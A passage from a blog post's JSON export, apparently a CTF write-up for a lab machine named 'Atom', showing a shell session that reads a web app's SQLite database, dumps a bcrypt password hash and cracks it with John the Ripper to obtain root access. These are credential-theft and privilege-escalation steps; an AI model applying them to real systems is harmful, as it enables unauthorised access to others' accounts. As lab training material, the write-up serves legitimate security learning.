May 27 15:21 html\nonida@atom:\/var\/www$ cd html\nonida@atom:\/var\/www\/html$ ls -la\ntotal 172\ndrwxr-xr-x 6 www-data www-data   4096 May 27 15:21 .\ndrwxr-xr-x 3 root     root       4096 May 25 22:19 ..\n-rwxr-xr-x 1 www-data www-data 114688 May 27 15:21 atom-2400-database.db\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 css\ndrwxr-xr-x 4 www-data www-data   4096 Dec 31  2400 img\n-rw-r--r-- 1 www-data www-data  11767 Dec 31  2400 index.php\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 js\n-rw-r--r-- 1 www-data www-data   6262 Dec 31  2400 login.php\n-rwxr-xr-x 1 www-data www-data   1637 Dec 31  2400 profile.php\n-rw-r--r-- 1 www-data www-data   5534 Dec 31  2400 register.php\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 video\nonida@atom:\/var\/www\/html$ cat profile.php \n&lt;?php\nsession_start();\n\nif (!isset($_SESSION[&#039;user&#039;])) {\n    header(&#039;Location: login.php&#039;);\n    exit();\n}\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Atom Owns The World&lt;\/title&gt;\n    &lt;style&gt;\n        body, html {\n            height: 100%;\n            margin: 0;\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            font-family: &#039;Arial&#039;, sans-serif;\n            color: white;\n            background: none;\n            overflow: hidden;\n        }\n        .bg-video {\n            position: fixed;\n            top: 50%;\n            left: 50%;\n            width: 100%;\n            height: 100%;\n            object-fit: cover;\n            transform: translate(-50%, -50%);\n            z-index: -1;\n        }\n        .message-container {\n            text-align: center;\n            
background-color: rgba(0, 0, 0, 0.5);\n            padding: 20px;\n            border-radius: 10px;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;video autoplay muted loop class=&quot;bg-video&quot;&gt;\n        &lt;source src=&quot;video\/gfp-astro-timelapse.mp4&quot; type=&quot;video\/mp4&quot;&gt;\n    &lt;\/video&gt;\n    &lt;div class=&quot;message-container&quot;&gt;\n        &lt;?php\n        echo &#039;&lt;h1&gt;Welcome, &#039; . htmlspecialchars($_SESSION[&#039;user&#039;]) . &#039;!&lt;\/h1&gt;&#039;;\n        if ($_SESSION[&#039;user&#039;] == &#039;atom&#039;) {\n            echo &#039;&lt;p&gt;You\\&#039;ve finally become the root of the earth!&lt;\/p&gt;&#039;;\n        } else {\n            echo &#039;&lt;p&gt;You\\&#039;ll soon be Atom\\&#039;s servant!&lt;\/p&gt;&#039;;\n        }\n        ?&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\nonida@atom:\/var\/www\/html$ cat atom-2400-database.db \nQ\ufffdY\ufffd&amp;\ufffd\ufffdmtableusersusersCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n))=indexsqlite_autoindex_users_1user\ufffd$))\ufffdtablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (\n    id INTEGER PRIMARY KEY,\n    ip_address TEXT NOT NULL,\n    attempt_time INTEGER NOT NULL\n\ufffd\ufffdnKE\ufffdatom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW\/M3fI6BkSohYOiBQqG7pK1F2fH9Cm\n\ufffd\ufffd\ufffd     atom<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221988.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221988.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719015814111\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>The relevant ports are open internally; try reading the database:<\/p>\n<pre><code class=\"language-bash\">onida@atom:\/var\/www\/html$ sqlite3\nSQLite version 3.40.1 2022-12-28 14:03:47\nEnter &quot;.help&quot; for usage hints.\nConnected to a transient in-memory database.\nUse &quot;.open FILENAME&quot; to reopen on a persistent database.\nsqlite&gt; .help\n.archive ...             Manage SQL archives\n.auth ON|OFF             Show authorizer callbacks\n.backup ?DB? FILE        Backup DB (default &quot;main&quot;) to FILE\n.bail on|off             Stop after hitting an error.  Default OFF\n.binary on|off           Turn binary output on or off.  Default OFF\n.cd DIRECTORY            Change the working directory to DIRECTORY\n.changes on|off          Show number of rows changed by SQL\n.check GLOB              Fail if output since .testcase does not match\n.clone NEWDB             Clone data into NEWDB from the existing database\n.connection [close] [#]  Open or close an auxiliary database connection\n.databases               List names and files of attached databases\n.dbconfig ?op? ?val?     List or change sqlite3_db_config() options\n.dbinfo ?DB?             Show status information about the database\n.dump ?OBJECTS?          Render database content as SQL\n.echo on|off             Turn command echo on or off\n.eqp on|off|full|...     Enable or disable automatic EXPLAIN QUERY PLAN\n.excel                   Display the output of next command in spreadsheet\n.exit ?CODE?             Exit this program with return-code CODE\n.expert                  EXPERIMENTAL. Suggest indexes for queries\n.explain ?on|off|auto?   Change the EXPLAIN formatting mode.  
Default: auto\n.filectrl CMD ...        Run various sqlite3_file_control() operations\n.fullschema ?--indent?   Show schema and the content of sqlite_stat tables\n.headers on|off          Turn display of headers on or off\n.help ?-all? ?PATTERN?   Show help text for PATTERN\n.import FILE TABLE       Import data from FILE into TABLE\n.imposter INDEX TABLE    Create imposter table TABLE on index INDEX\n.indexes ?TABLE?         Show names of indexes\n.limit ?LIMIT? ?VAL?     Display or change the value of an SQLITE_LIMIT\n.lint OPTIONS            Report potential schema issues.\n.load FILE ?ENTRY?       Load an extension library\n.log FILE|off            Turn logging on or off.  FILE can be stderr\/stdout\n.mode MODE ?OPTIONS?     Set output mode\n.nonce STRING            Suspend safe mode for one command if nonce matches\n.nullvalue STRING        Use STRING in place of NULL values\n.once ?OPTIONS? ?FILE?   Output for the next SQL command only to FILE\n.open ?OPTIONS? ?FILE?   Close existing database and reopen FILE\n.output ?FILE?           Send output to FILE or stdout if FILE is omitted\n.parameter CMD ...       Manage SQL parameter bindings\n.print STRING...         Print literal STRING\n.progress N              Invoke progress handler after every N opcodes\n.prompt MAIN CONTINUE    Replace the standard prompts\n.quit                    Exit this program\n.read FILE               Read input from FILE or command output\n.recover                 Recover as much data as possible from corrupt db.\n.restore ?DB? FILE       Restore content of DB (default &quot;main&quot;) from FILE\n.save ?OPTIONS? FILE     Write database to FILE (an alias for .backup ...)\n.scanstats on|off        Turn sqlite3_stmt_scanstatus() metrics on or off\n.schema ?PATTERN?        Show the CREATE statements matching PATTERN\n.selftest ?OPTIONS?      Run tests defined in the SELFTEST table\n.separator COL ?ROW?     Change the column and row separators\n.session ?NAME? CMD ...  
Create or control sessions\n.sha3sum ...             Compute a SHA3 hash of database content\n.shell CMD ARGS...       Run CMD ARGS... in a system shell\n.show                    Show the current values for various settings\n.stats ?ARG?             Show stats or turn stats on or off\n.system CMD ARGS...      Run CMD ARGS... in a system shell\n.tables ?TABLE?          List names of tables matching LIKE pattern TABLE\n.testcase NAME           Begin redirecting output to &#039;testcase-out.txt&#039;\n.testctrl CMD ...        Run various sqlite3_test_control() operations\n.timeout MS              Try opening locked tables for MS milliseconds\n.timer on|off            Turn SQL timer on or off\n.trace ?OPTIONS?         Output each SQL statement as it is run\n.vfsinfo ?AUX?           Information about the top-level VFS\n.vfslist                 List all available VFSes\n.vfsname ?AUX?           Print the name of the VFS stack\n.width NUM1 NUM2 ...     Set minimum column widths for columnar output\nsqlite&gt; .open atom-2400-database.db\nsqlite&gt; .databases\nmain: \/var\/www\/html\/atom-2400-database.db r\/o\nsqlite&gt; .schema\nCREATE TABLE login_attempts (\n    id INTEGER PRIMARY KEY,\n    ip_address TEXT NOT NULL,\n    attempt_time INTEGER NOT NULL\n);\nCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n);\nsqlite&gt; .output \/tmp\/temp.sql\nsqlite&gt; .dump users\n\nonida@atom:\/var\/www\/html$ cd \/tmp\nonida@atom:\/tmp$ ls -la\ntotal 44\ndrwxrwxrwt 10 root  root  4096 Jul 18 20:17 .\ndrwxr-xr-x 18 root  root  4096 May 24 14:18 ..\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .font-unix\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .ICE-unix\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-apache2.service-ZaMynb\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-ModemManager.service-orjtq7\ndrwx------  3 root  root  
4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-logind.service-Lau3sB\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-timesyncd.service-0iGCTP\n-rw-r--r--  1 onida onida  265 Jul 18 20:17 temp.sql\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .X11-unix\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .XIM-unix\nonida@atom:\/tmp$ cat temp.sql \nPRAGMA foreign_keys=OFF;\nBEGIN TRANSACTION;\nCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n);\nINSERT INTO users VALUES(1,&#039;atom&#039;,&#039;$2y$10$Z1K.4yVakZEY.Qsju3WZzukW\/M3fI6BkSohYOiBQqG7pK1F2fH9Cm&#039;);\nCOMMIT;<\/code><\/pre>\n<p>Try cracking the hash:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ john hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:\/usr\/share\/john\/password.lst\nmadison          (?)     \n1g 0:00:00:02 DONE 2\/3 (2024-07-18 14:19) 0.4255g\/s 84.25p\/s 84.25c\/s 84.25C\/s goodluck..mother\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. 
<\/code><\/pre>\n<p>Use the password to log in as root.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Atom Information Gathering Port Scanning \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom] \u2514\u2500$ rustsca 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-763","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=763"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763\/revisions"}],"predecessor-version":[{"id":764,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763\/revisions\/764"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=763"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}